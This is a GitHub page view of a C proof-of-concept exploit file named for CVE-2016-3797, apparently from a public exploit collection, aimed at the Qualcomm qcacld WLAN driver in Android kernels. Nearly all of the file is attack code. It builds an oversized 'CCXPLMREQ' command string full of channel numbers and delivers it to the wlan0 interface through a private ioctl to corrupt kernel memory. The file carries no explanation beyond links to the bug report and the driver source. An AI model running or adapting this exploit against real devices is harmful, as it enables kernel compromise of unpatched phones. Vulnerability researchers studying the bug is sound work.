-
Notifications
You must be signed in to change notification settings - Fork 202
/
Copy pathCVE-2016-3797.c
111 lines (92 loc) · 2.98 KB
/
CVE-2016-3797.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
/*** CVE-2016-3797.c
*
* https://code.google.com/p/android/issues/detail?id=206140
* https://android.googlesource.com/kernel/msm.git/+/android-msm-bullhead-3.10-n-preview-1/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_main.c#2836
*
*
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>
#include <strings.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <net/if.h>
#include <sys/types.h>
#include <sys/socket.h>
/*
struct ifreq {
char ifr_name[IFNAMSIZ]
union {
struct sockaddr ifr_addr;
struct sockaddr ifr_dstaddr;
struct sockaddr ifr_broadaddr;
struct sockaddr ifr_netmask;
struct sockaddr ifr_hwaddr;
short ifr_flags;
int ifr_ifindex;
int ifr_metric;
int ifr_mtu;
struct ifmap ifr_map;
char ifr_slave[IFNAMSIZ];
char ifr_newname[IFNAMSIZ];
char *ifr_data;
};
};
*/
typedef struct hdd_priv_data_s
{
char *buf;
int used_len;
int total_len;
}hdd_priv_data_t;
static void fill_data(char *data, int used) {
while(used <= 8192)
used += snprintf(data + used, 8192 - used,
" %d %d %d %d", 1, 2, 3, 4);
}
int main(void)
{
int fd;
struct ifreq freak = { 0 };
memcpy(freak.ifr_name, "wlan0", 5);
fd = socket(AF_INET, SOCK_STREAM, 0);
hdd_priv_data_t priv_data = { 0 };
priv_data.total_len = 8192;
priv_data.buf = mmap(NULL, 4096 * 3, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
/*
CCXPLMREQ<space><enable><space><dialog_token><space>
<meas_token><space><num_of_bursts><space><burst_int><space>
<measu duration><space><burst_len><space><desired_tx_pwr> 8
<space><multcast_addr><space><number_of_channels>
<space><channel_numbers>
*/
strcpy(priv_data.buf, "CCXPLMREQ 1 2 3 4 5 6 7 8 FF FF FF FF FF FF 255 ");
/*
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 \
25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 41 43 44 45 46 47 48 49 50 \
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 \
25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 41 43 44 45 46 47 48 49 50 \
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 \
25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 41 43 44 45 46 47 48 49 50 \
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 \
25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 41 43 44 45 46 47 48 49 50 \
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 \
25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 41 43 44 45 46 47 48 49 50 \
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ");
*/
fill_data(priv_data.buf, 48);
if (fd < 0) {
printf("Failed with %s\n", strerror(errno));
}
printf("Got socket # %d\n", fd);
freak.ifr_data = (void*)&priv_data;
ioctl(fd, SIOCDEVPRIVATE + 1, &freak);
printf("ret is %s\n", strerror(errno));
close(fd);
}